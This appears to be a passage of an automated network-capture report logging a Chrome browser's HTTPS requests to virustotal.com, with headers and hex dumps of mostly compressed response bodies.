                                                                                                                                                                                                                    2024-04-25 19:55:19 UTC1255INData Raw: 6e 5b 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 4e 7d 2c 28 52 28 66 75 6e 63 74 69 6f 6e 28 70 29 7b 70 28 4e 29 7d 29 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 5d 7d 2c 72 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 49 65 3d 66 75 6e 63 74 69 6f 6e 28 52 2c 4e 2c 70 2c 65 29 7b 72 65 74 75 72 6e 20 5a 28 28 64 28 34 33 38 2c 52 2c 28 46 79 28 4e 2c 28 28 65 3d 5a 28 34 33 38 2c 52 29 2c 52 2e 50 29 26 26 65 3c 52 2e 73 3f 28 64 28 34 33 38 2c 52 2c 52 2e 73 29 2c 5a 65 28 52 2c 70 29 29 3a 64 28 34 33 38 2c 52 2c 70 29 2c 52 29 29 2c 65 29 29 2c 32 36 31 29 2c 52 29 7d 2c 4e 5f 3d 66 75 6e 63 74 69 6f 6e 28 52 2c 4e 2c 70 29 7b 72 65 74 75 72 6e 28 70 3d 6c 5b 4e 2e 57 5d 28 4e 2e 4f 52 29 2c 70 5b 4e 2e 57 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72
                                                                                                                                                                                                                    Data Ascii: n[function(){return N},(R(function(p){p(N)}),function(){})]},r=this||self,Ie=function(R,N,p,e){return Z((d(438,R,(Fy(N,((e=Z(438,R),R.P)&&e<R.s?(d(438,R,R.s),Ze(R,p)):d(438,R,p),R)),e)),261),R)},N_=function(R,N,p){return(p=l[N.W](N.OR),p[N.W]=function(){r
                                                                                                                                                                                                                    2024-04-25 19:55:19 UTC1255INData Raw: 4e 5d 7c 30 29 2d 28 52 5b 28 28 4e 7c 30 29 2b 31 29 25 33 5d 7c 30 29 2d 28 65 7c 30 29 5e 28 31 3d 3d 4e 3f 65 3c 3c 70 3a 65 3e 3e 3e 70 29 7d 63 61 74 63 68 28 77 29 7b 74 68 72 6f 77 20 77 3b 7d 7d 2c 6e 3d 66 75 6e 63 74 69 6f 6e 28 52 2c 4e 2c 70 2c 65 2c 77 2c 54 29 7b 69 66 28 21 70 2e 72 69 26 26 28 54 3d 76 6f 69 64 20 30 2c 4e 26 26 4e 5b 30 5d 3d 3d 3d 4d 26 26 28 54 3d 4e 5b 32 5d 2c 52 3d 4e 5b 31 5d 2c 4e 3d 76 6f 69 64 20 30 29 2c 65 3d 5a 28 31 37 32 2c 70 29 2c 30 3d 3d 65 2e 6c 65 6e 67 74 68 26 26 28 77 3d 5a 28 33 33 31 2c 70 29 3e 3e 33 2c 65 2e 70 75 73 68 28 52 2c 77 3e 3e 38 26 32 35 35 2c 77 26 32 35 35 29 2c 76 6f 69 64 20 30 21 3d 54 26 26 65 2e 70 75 73 68 28 54 26 32 35 35 29 29 2c 52 3d 22 22 2c 4e 26 26 28 4e 2e 6d 65 73
                                                                                                                                                                                                                    Data Ascii: N]|0)-(R[((N|0)+1)%3]|0)-(e|0)^(1==N?e<<p:e>>>p)}catch(w){throw w;}},n=function(R,N,p,e,w,T){if(!p.ri&&(T=void 0,N&&N[0]===M&&(T=N[2],R=N[1],N=void 0),e=Z(172,p),0==e.length&&(w=Z(331,p)>>3,e.push(R,w>>8&255,w&255),void 0!=T&&e.push(T&255)),R="",N&&(N.mes
                                                                                                                                                                                                                    2024-04-25 19:55:19 UTC1255INData Raw: 2e 41 3d 54 3b 69 66 28 21 6b 7c 7c 54 2d 65 2e 43 3c 65 2e 42 4f 2d 28 70 3f 32 35 35 3a 4e 3f 35 3a 32 29 29 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 72 65 74 75 72 6e 20 65 2e 5a 3d 28 64 28 34 33 38 2c 28 70 3d 5a 28 28 65 2e 74 54 3d 52 2c 4e 29 3f 33 33 31 3a 34 33 38 2c 65 29 2c 65 29 2c 65 2e 73 29 2c 65 2e 56 2e 70 75 73 68 28 5b 69 47 2c 70 2c 4e 3f 52 2b 31 3a 52 2c 65 2e 44 2c 65 2e 6a 2c 65 2e 76 2c 65 2e 69 5d 29 2c 44 65 29 2c 74 72 75 65 7d 2c 48 3d 66 75 6e 63 74 69 6f 6e 28 52 2c 4e 29 7b 4e 2e 42 3d 28 28 4e 2e 42 3f 4e 2e 42 2b 22 7e 22 3a 22 45 3a 22 29 2b 52 2e 6d 65 73 73 61 67 65 2b 22 3a 22 2b 52 2e 73 74 61 63 6b 29 2e 73 6c 69 63 65 28 30 2c 32 30 34 38 29 7d 2c 44 65 3d 72 2e 72 65 71 75 65 73 74 49 64 6c 65 43 61 6c 6c 62 61 63
                                                                                                                                                                                                                    Data Ascii: .A=T;if(!k||T-e.C<e.BO-(p?255:N?5:2))return false;return e.Z=(d(438,(p=Z((e.tT=R,N)?331:438,e),e),e.s),e.V.push([iG,p,N?R+1:R,e.D,e.j,e.v,e.i]),De),true},H=function(R,N){N.B=((N.B?N.B+"~":"E:")+R.message+":"+R.stack).slice(0,2048)},De=r.requestIdleCallbac


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    92192.168.2.164983874.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:19 UTC537OUTGET /gui/manifest.json HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: manifest
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC340INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 3d6944854118d734c0a418dae04cd3f9
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:12 GMT
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:56:12 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=60
                                                                                                                                                                                                                    Age: 7
                                                                                                                                                                                                                    ETag: "M_mJ7A"
                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC383INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8c 0d 0a 30 30 30 30 30 30 30 31 0d 0a 90 0d 0a 30 30 30 64 61 0d 0a c1 0e 82 30 0c 86 ef 3c c5 32 af 0a 01 c3 41 9f c3 78 31 c6 14 18 b8 38 36 b2 0e 23 12 de dd 75 90 78 22 7a 68 0f fd fa f7 ff d3 31 62 8c 6b 68 05 3f 32 7e 96 b6 c7 93 71 a0 f8 96 e6 78 37 d6 dd 56 a9 03 4f 7b ab 48 1a 27 b3 a4 92 d8 29 18 68 84 0e 74 05 ca 68 31 23 77 17 ad
                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001000000010000000100000001000000010000000100000001000000010000000100000001000da0<2Ax186#ux"zh1bkh?2~qx7VO{H')hth1#w
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    93192.168.2.164983974.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:19 UTC738OUTGET /gui/images/favicon.svg HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                    Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: image
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC338INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: a6c0a34884473c5c933181f94664cd46
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:54:46 GMT
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:55:46 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=60
                                                                                                                                                                                                                    Age: 33
                                                                                                                                                                                                                    ETag: "M_mJ7A"
                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC365INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31 0d 0a 4c 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8e 0d 0a 30 30 30 30 30 30 30 31 0d 0a 3b 0d 0a 30 30 30 62 62 0d 0a 0f 82 30 14 85 77 7e c5 cd 75 a6 bd 54 50 6a 28 83 13 83 ae ee 9a 56 4a 52 1e d1 4a 0d bf de 62 1c 9c 4e be 9c 9c 47 f5 9c 5b 08 9d f6 56 61 66 7a 04 6b ba d6 fa 1f bc 7b 37 3c 15 5a ef a7 03 e7 21 04 16 b6 6c 7c b4 5c 10 11 8f 51 84 b9
                                                                                                                                                                                                                    Data Ascii: 0000000100000001000000010000000100000001000000010000000100000001000000010000000100000001L0000000100000001;000bb0w~uTPj(VJRJbNG[Vafzk{7<Z!l|\Q
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    94192.168.2.164984174.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:19 UTC364OUTGET /gui/static/opensearch.xml HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC339INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 553f84c5fd8edbc433b48a991a7e7057
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:19 GMT
                                                                                                                                                                                                                    Expires: Thu, 25 Apr 2024 19:56:19 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=60
                                                                                                                                                                                                                    ETag: "M_mJ7A"
                                                                                                                                                                                                                    Content-Type: application/xml
                                                                                                                                                                                                                    Age: 1
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC397INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31 0d 0a 84 0d 0a 30 30 30 30 31 0d 0a 90 0d 0a 65 65 0d 0a 3b 4f c4 30 0c c7 67 fa 29 a2 ec 57 ab 0b 12 28 cd c4 72 0b 0c f7 d8 a3 60 9a 48 cd 43 b1 ef 5a 84 f8 ee a4 2d 82 1b 90 98 6c 59 bf ff 43 56 2f 19 e3 01 4d b1 ee 09 c9 16 9f d9 a7 28 e6 30 46 ea a5 63 ce 8f 00 e6 a1 b5 29 c0 0e 28 a3 85 54 15 b4 2a a0 6b 3b 90 ba b9 53 07 97 0a 3f 9b 80 fa 7c
                                                                                                                                                                                                                    Data Ascii: 000000010000000100000001000000010000000100000001000000010000000100000001000000010000000100001ee;O0g)W(r`HCZ-lYCV/M(0Fc)(T*k;S?|
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    95192.168.2.164984074.125.34.464432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:19 UTC608OUTGET /gui/service-worker.js HTTP/1.1
                                                                                                                                                                                                                    Host: www.virustotal.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    Cache-Control: max-age=0
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Service-Worker: script
                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Mode: same-origin
                                                                                                                                                                                                                    Sec-Fetch-Dest: serviceworker
                                                                                                                                                                                                                    Referer: https://www.virustotal.com/
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    Cookie: _ga=GA1.2.291708482.1714074916; _gid=GA1.2.467745921.1714074916; _gat=1; _ga_BLNDV9X2JR=GS1.1.1714074915.1.0.1714074917.0.0.0
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC357INHTTP/1.1 200 OK
                                                                                                                                                                                                                    X-Cloud-Trace-Context: 857cc08e264e05d91fcc4d9ba9ec626a
                                                                                                                                                                                                                    Content-Encoding: gzip
                                                                                                                                                                                                                    Server: Google Frontend
                                                                                                                                                                                                                    Date: Fri, 19 Apr 2024 11:25:21 GMT
                                                                                                                                                                                                                    Expires: Sat, 19 Apr 2025 11:25:21 GMT
                                                                                                                                                                                                                    Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                    ETag: "4IXFzQ"
                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                    Age: 548998
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC1051INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 31 0d 0a 00 0d 0a 30 66 66 62 0d 0a 00 00 00 02 ff ec bd 09 7f 23 c7 91 e6 fd 55 d8 fc f9 6d 81 63 10 aa fb 20 4d f5 ca 92 3c 96 c7 96 3c 92 6c ef 4e bf da 9e 3a b2 48 48 20 8a 2e 00 dd 4d b3 f9 dd f7 1f 99 55 38 48 b0 19 94 2d 79 66 57 1e 8d 44 90 a8 aa ac cc c8 38 9e 78 22 72 34 3a 3a fb e8 e6 70 b5 30 07 8b 65 37 ad 96 87 a7 af 8b ee c0 9c dd 84 79 7e 62 ff b8 ec ae 6f 16 66 d6 bc 3c 7c d3 76 df 97 ed db 93 aa a8 2e 4c 51 ce cc 71 67 16 57 ed 7c 61 4e d2 89 37 f1 0e bf 7d fe fc d5 e8 e8 b6 2a 96 d5 c5 c8 1c dd dc de 8e 83 28 7a f0 36 6d f7 9e 0b b3 28 7e e8 42 f3 f6 6a da 15 cb 69 3b 7f
                                                                                                                                                                                                                    Data Ascii: 00000001000000010000000100000001000010ffb#Umc M<<lN:HH .MU8H-yfWD8x"r4::p0e7y~bof<|v.LQqgW|aN7}*(z6m(~Bji;
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC1408INData Raw: 65 74 aa 4e 1e 2c 3a ad 1a af 7a 7d 37 b3 17 fe c5 14 df ff a1 b8 1a 37 3b 9f 2e 76 3e d5 3b 9f ae b6 3f 9d ca 3d af cf 6e 44 7e ad 60 32 4d cd c8 1c 4c d1 a8 c5 bc 32 6d 73 f0 f9 a7 bf fe a6 2b e6 8b c2 6a 79 fb f7 43 11 be 43 91 f6 41 ad 37 76 07 98 23 51 fa 87 ad dd 3a 5f a3 d4 cc 17 28 af c5 ce 37 cd e4 ee 9f df bd bb d8 be 7a 21 d7 ed 5c 32 bf 77 c9 4b ff db 17 4e d5 9c ec fc 71 b4 f3 c9 3e 1c fd 73 74 db af ce f9 c8 c8 96 bc 1d 2f cc f2 a4 7f df b3 8f ec 2f cf e6 e3 67 28 ff 8b 62 61 ff 80 9f f2 9e 49 40 41 6c a6 e0 dd bb c3 ad 21 bf 7b b7 64 f2 0e cc 96 5d 7c bd 25 1f 06 5b c8 84 7e 5a 2c 8b b2 60 cf 5e 75 ed b2 5d 5e 5f b1 d6 9b 39 e6 8e 77 e7 e8 90 7b ee 2e c4 e6 d2 17 a3 d5 bb 77 a3 d5 d9 4b be f0 c9 aa 5b b4 dd e6 6f 93 a2 7e 2d eb 38 de f7 37
                                                                                                                                                                                                                    Data Ascii: etN,:z}77;.v>;?=nD~`2ML2ms+jyCCA7v#Q:_(7z!\2wKNq>st//g(baI@Al!{d]|%[~Z,`^u]^_9w{.wK[o~-87
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC1408INData Raw: 38 3f be 00 2d 2b 1c 5a 56 81 96 55 bf 2a 4e 2b 54 ea e2 65 b5 8b 96 55 6b 8f be c3 20 4c cf a6 bc 21 5e cb 68 31 59 5c 4c 9b e5 48 74 fa e8 7a 6a 66 f5 10 d4 4f c4 fb 7d 39 7d 39 ff 76 84 e7 bb 00 8d 03 8f b1 58 07 1e 0d a1 dc 3f 0e 2a 10 5f 7b 1f 54 50 88 fd f8 1a 27 5b 10 9a 62 bc d8 07 15 d8 f0 7c e7 3b 1b a8 a0 d0 42 05 cb e1 f1 f7 a1 82 c1 ce 7f d6 3b 0a 53 a0 cf db 6b 59 f0 8f 5e 8d 5e 8d 6e 6e 71 2c c6 fc 5b c2 f6 13 f1 b8 31 85 67 1f 7d 69 7d ef 77 ef 8c 93 68 fb 5b 17 d0 0a b4 78 f6 d1 b3 67 9b 6f 88 27 2f bf c5 ac 8e ae 05 ed 03 00 c7 19 1d a0 dc ef 7e 62 dd b1 7e f0 27 32 fb bd da 1d 7e f9 f7 82 42 ef 5d e9 ef 14 2b bd f3 9d 07 56 ba 77 b9 3e 3f 3b b4 00 cf 31 81 4e 87 2d 3f 1c 7f 2a 4e d8 8e 77 2c 50 ad b9 03 d1 0e 2b be 14 37 f0 e2 ec f0 90
                                                                                                                                                                                                                    Data Ascii: 8?-+ZVU*N+TeUk L!^h1Y\LHtzjfO}9}9vX?*_{TP'[b|;B;SkY^^nnq,[1g}i}wh[xgo'/~b~'2~B]+Vw>?;1N-?*Nw,P+7
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC294INData Raw: 6d be 6e e1 30 8f 8b e2 b5 39 28 0e ee 49 e6 e8 e8 e0 d2 2c 2f da 5a c0 0f 99 1c b2 d7 67 c0 10 8b b3 67 fe 66 56 b6 e6 0a 6c 6d 10 9f db dd b9 92 ab 99 63 14 d0 5b 62 c0 c1 a5 91 dc ad cc 18 18 c6 9d 89 e1 11 1e ba d3 ce cc d6 03 24 73 5e 80 e9 5b d3 3e 47 cb 09 c1 84 cf fd 4f 98 2b b6 1d f1 e4 b5 6c 9e c5 91 9b d0 e9 2d ff 1b 6e 72 e0 64 e3 c6 5a 5c 84 01 f9 20 a7 ef 96 ef 08 41 00 8d 1f 3e ad ed dd 1c 7b b7 9d e4 59 12 3d 91 cf 9a 63 f3 3a c2 56 c0 ab f9 26 ea dd 3c e9 0b d9 6f 3f 61 de 7f fd 8a df 20 f8 83 09 1d 7e f9 a3 46 54 5f 28 22 aa 9d ef 3c 18 51 59 ea c2 1f 9c 27 b1 89 7c 9c ab bf f6 df fb 05 52 7b fa 3d f9 04 42 c2 6a 3e c7 0e 23 be 7d 68 d1 99 6e 35 ef 33 1c a6 de fc fe b2 78 db 3b 86 e0 24 9b 0f fd 55 fc e2 e3 73 f3 b5 41 e7 d5 0b f7 85 cd
                                                                                                                                                                                                                    Data Ascii: mn09(I,/ZggfVlmc[b$s^[>GO+l-nrdZ\ A>{Y=c:V&<o?a ~FT_("<QY'|R{=Bj>#}hn53x;$UsA
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a d7 0d 0a 30 30 30 30 30 30 30 31 0d 0a f3 0d 0a 30 30 30 30 31 66 66 65 0d 0a cd 6e 6c 80 f0 63 a5 d6 ef 3b a8 45 09 8b e4 0f 77 df da 3b 22 e7 b5 f9 3a 5b af 77 41 65 33 bc da 79 db 17 c4 44 66 32 6f df 8c 8e 8e 7d 13 fe cb dd bf 9f 78 50 38 9c eb c7 9f 76 5f 48 68 5d d3 8d c7 4d aa c4 de bc 9f 68 81 d6 dc 85 c2 05 74 5e ed c2 ba c8 32 e4 b5 0f e8 b4 34 44 9a b3 ef 51 f8 a7 a2 10 c4 2d 9d 4e 16 a8 95 67 a3 16 c0 69 2e 31 8c a8 95 b5 bb bc 3c 1b dc e5 3b 5e 69 3f 86 cd da 90 4e 5d 93 0b e1 a1 c9 ec af 35 ca a4 41 bf 30 96 f5 bc 8a bc f0 79 77 3a c5 98 dc fd 9d 7c 91 18 f7 ce 04 10 1e 3a 37 62 65 09 38 8f 44 46 77 96 d8 bd 08 71 cf 9d 39 be 13 49 6e 96 ab 7f d6 74 01 16 f1 99 5d 08 71 68 ac 07 bd 1b 82 dd 79 10 b2 c4 53 76 84
                                                                                                                                                                                                                    Data Ascii: 000000010000000100001ffenlc;Ew;":[wAe3yDf2o}xP8v_Hh]Mht^24DQ-Ngi.1<;^i?N]5A0yw:|:7be8DFwq9Int]qhySv
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC1408INData Raw: 6e 13 0e fc cf 7f 96 1b fa bf 7e 6a 37 f4 7f 2a dc d0 9d ef 3c e4 86 0e ca f0 e0 3f 58 38 37 a3 a3 ff 38 fb 5f db ce 20 75 61 2e 5b 0a 22 2e ce 1c cb e6 92 b9 37 0e 22 b7 54 17 eb 74 4d fa f2 42 be d1 11 8e 5a 49 bc 53 7a b8 6b 83 ab ae 5d 60 74 6d 51 e2 31 00 c7 f5 ba fc f7 70 7c e3 7e 7d d2 41 56 b1 b9 26 4a 4e c9 3a cd 80 f9 08 7b a7 67 37 bd 31 39 11 b9 72 86 6f 41 7a bb ff 2d 01 b7 2d 37 3c 11 8a 82 d4 1d f6 9f bf 21 1d b1 fe 9d 7c b8 95 1c ed 8b 39 3e e8 c9 14 9c 00 f9 7d d1 5a c1 3b 19 3c 2c 32 a1 92 f1 ef c5 6d 47 8a 29 ff 12 97 ea e8 01 96 d7 7a 72 0d b8 e2 3f 27 40 c2 aa 6e 7c d8 61 3c 6b a7 5f 9c 87 7f 74 84 c4 bb 3e ce ab db fd d2 a3 c2 c9 92 0b 60 61 6d fc fc ec 47 36 d6 eb 59 b2 8f 44 96 95 d9 d6 ce 0d f2 07 61 0c 3f 00 5d b0 ea 73 0f c0 30
                                                                                                                                                                                                                    Data Ascii: n~j7*<?X878_ ua.[".7"TtMBZISzk]`tmQ1p|~}AV&JN:{g719roAz--7<!|9>}Z;<,2mG)zr?'@n|a<k_t>`amG6YDa?]s0
                                                                                                                                                                                                                    2024-04-25 19:55:20 UTC1408INData Raw: 0a f6 82 b5 aa da 70 b0 f4 52 4a 81 65 2f a5 dd d9 00 d4 8d b6 87 37 de 7e f9 93 c2 95 02 af 1f 89 0c 0d 92 b2 e8 a5 aa b7 82 ac d1 bb 77 03 6f 70 ad 31 de 27 d6 a8 1e 11 2e fb 4e 6e b1 7b aa 2d ac 30 6c e4 20 1a fb c5 6a 7a e6 96 d5 6a 51 97 ae 86 cc 4a 01 01 46 76 8d d9 41 4e ee 29 ed 74 b6 05 e7 82 d4 ca 76 76 1a 66 58 d6 76 67 59 a7 e3 43 d7 f4 c2 c2 a5 f0 30 dc 86 93 bb c2 f3 b1 43 3d a6 42 19 8d b6 bc 38 9e b7 db 39 46 29 a5 ee e0 ea da da d4 e1 29 55 bf d2 ed e4 95 99 2f 20 b8 0e 59 eb af 8b c6 7c d3 7e 22 62 27 a5 08 92 1a aa 7a a3 02 ab d8 0d 71 85 28 6e c4 74 c6 ca d9 01 d8 52 ec 86 4f db 2b 35 be e8 9f b4 9d b3 b7 15 a1 b3 a3 71 cd 8d 76 ac 93 bd cf 9a 60 86 10 5f 9d d5 2f 9c 98 af 61 01 3c 15 db 12 62 c0 0b a6 0f 05 bb a3 0b 18 c9 83 1e 79 79
                                                                                                                                                                                                                    Data Ascii: pRJe/7~wop1'.Nn{-0l jzjQJFvAN)tvvfXvgYC0C=B89F))U/ Y|~"b'zq(ntRO+5qv`_/a<byy
